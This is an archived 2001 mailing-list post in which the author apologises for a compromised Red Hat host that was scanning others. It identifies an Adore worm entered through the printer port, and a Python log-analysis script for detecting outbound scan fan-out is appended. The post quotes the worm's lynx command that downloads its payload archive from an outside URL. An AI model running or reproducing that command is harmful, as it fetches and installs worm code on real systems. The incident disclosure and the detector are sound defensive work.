Mea Culpa

From: Etaoin Shrdlu (shrdluat_private)
Date: Sat Jun 23 2001 - 11:15:56 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    If you saw anything from my redhat/linux machine in the past few hours,
    sorry.
    
    Jun 23 07:42|206.111.213.148|2650|65.169.x.x|53
    Jun 23 07:42|206.111.213.148|2822|65.199.x.x|515
    Jun 23 07:42|206.111.213.148|2823|65.199.x.x|515
    
    Yet another rootkit. It was slated to be upgraded to progeny/linux over
    the weekend, and I'm still deciding on whether to bother with forensics.
    It is an automated script, so I doubt that much information will be
    useful. The standard stuff on the standard, easily compromisable ports.
    They got in through the printer port, which I thought had been shut
    down. Famous last words.
    
    If it appears to be unique, I'll send it off to the places that seem to
    be archiving these things. Most of the interesting data (and certainly
    an early trigger) that warned me instantly that something was up
    (besides the mad green lights on the router when I wasn't doing anything
    to cause them) was clog (connection logger), a fine piece of code whose
    original author seems to have disappeared from the face of the earth.
    
    ...
    
    Well, after further examination, it's just yet another adore worm
    running pscan-* stuff against innocent folk out there. It was dumping
    from the following:
    
    lynx -dump http://go.163.com/laowang2001/red.tar >/usr/lib/red.tar
    
    The rest is history (except for all the passwords I get to change, just
    in case I had a duplicate somewhere). Again, if my bad boy bothered you
    from Pacific time 11pm June 22 until approximately 8am June 23, I'm
    sorry. I'll be reformatting the disk before it goes back up, and it'll
    either have Slack or Debian (two civilized distros, in my personal
    opinion), well-patched.
    
    .shrdlu
    
    -----BEGIN PGP SIGNATURE-----
    Version: PGPfreeware 5.0i for non-commercial use
    Charset: noconv
    
    iQA/AwUBOzTcliseoSr+8iWrEQKIeACg0vWZ/nSrgS0wIdId6epU3izbe7oAoJKq
    H8F3x5rc+BG6441TNTIP9htP
    =wol2
    -----END PGP SIGNATURE-----
    
    --
    Computer security is an oxymoron.
    Prepare for the worst.
                    -- Bruce Schneier
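The connection-logger records quoted in the post (timestamp|source|source port|destination|destination port) are what tipped the author off: one host suddenly fanning out to many addresses on tcp/515 and tcp/53. As an added example that is not part of the original post and not clog's own code, here is a small Python detector that parses records in that format and flags any single source that reaches many distinct destinations on the same port within a short window. The field order is assumed from the three lines in the post; the sample records and addresses (RFC 5737 documentation ranges) are constructed.

```python
"""Flag outbound fan-out (scan-like) patterns in pipe-delimited connection logs.

Record format assumed from the post: "Mon DD HH:MM|src_ip|src_port|dst_ip|dst_port".
The sample below is constructed with RFC 5737 documentation addresses; it is not
data from the compromised host.
"""
from collections import defaultdict
from datetime import datetime

# Constructed sample: 192.0.2.10 fans out to six hosts on tcp/515 within two
# minutes (plus one DNS and one web connection), while 192.0.2.11 just talks
# to a single HTTPS server twice. Only the first pattern should be reported.
SAMPLE_LOG = """\
Jun 23 07:41|192.0.2.10|2601|198.51.100.5|80
Jun 23 07:42|192.0.2.10|2650|198.51.100.1|53
Jun 23 07:42|192.0.2.10|2822|198.51.100.2|515
Jun 23 07:42|192.0.2.10|2823|198.51.100.3|515
Jun 23 07:42|192.0.2.10|2824|198.51.100.4|515
Jun 23 07:42|192.0.2.10|2825|198.51.100.6|515
Jun 23 07:42|192.0.2.10|2826|198.51.100.7|515
Jun 23 07:43|192.0.2.10|2827|198.51.100.8|515
Jun 23 07:50|192.0.2.11|40001|198.51.100.9|443
Jun 23 07:50|192.0.2.11|40002|198.51.100.9|443
"""


def parse_record(line, year=2001):
    """Parse one record into a dict; return None for malformed lines.

    The log carries no year, so the caller supplies one (assumption)."""
    parts = line.strip().split("|")
    if len(parts) != 5:
        return None
    ts, src, sport, dst, dport = parts
    try:
        when = datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M")
        return {"time": when, "src": src, "sport": int(sport),
                "dst": dst, "dport": int(dport)}
    except ValueError:
        return None


def find_fanout(records, min_targets=5, window_minutes=5):
    """Return sorted (src, dport, n_targets) tuples for every source that
    contacted at least `min_targets` distinct destinations on the same port
    inside some `window_minutes` span. A sliding window over the time-sorted
    events keeps a per-destination count so hosts drop out as they age."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["src"], r["dport"])].append((r["time"], r["dst"]))

    hits = []
    for (src, dport), events in by_key.items():
        events.sort()
        start = 0
        seen = defaultdict(int)  # destination -> hits currently inside window
        best = 0
        for t, dst in events:
            seen[dst] += 1
            # Evict events older than the window from the left edge.
            while (t - events[start][0]).total_seconds() > window_minutes * 60:
                old_dst = events[start][1]
                seen[old_dst] -= 1
                if seen[old_dst] == 0:
                    del seen[old_dst]
                start += 1
            best = max(best, len(seen))
        if best >= min_targets:
            hits.append((src, dport, best))
    return sorted(hits)


def scan_log(text, **kw):
    """Parse a whole log and return the fan-out findings."""
    records = [r for r in (parse_record(l) for l in text.splitlines()) if r]
    return find_fanout(records, **kw)


if __name__ == "__main__":
    for src, dport, n in scan_log(SAMPLE_LOG):
        print(f"possible outbound scan: {src} reached {n} hosts on port {dport}")
```

The thresholds are deliberately conservative; a legitimate print server or DNS resolver talks to a handful of peers, whereas the traffic in the post hits a fresh destination on tcp/515 every second. Tune `min_targets` and `window_minutes` to the host's normal fan-out, and pair the alert with a per-port allow-list for services the box is actually expected to reach.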
    



    This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 20:13:39 PDT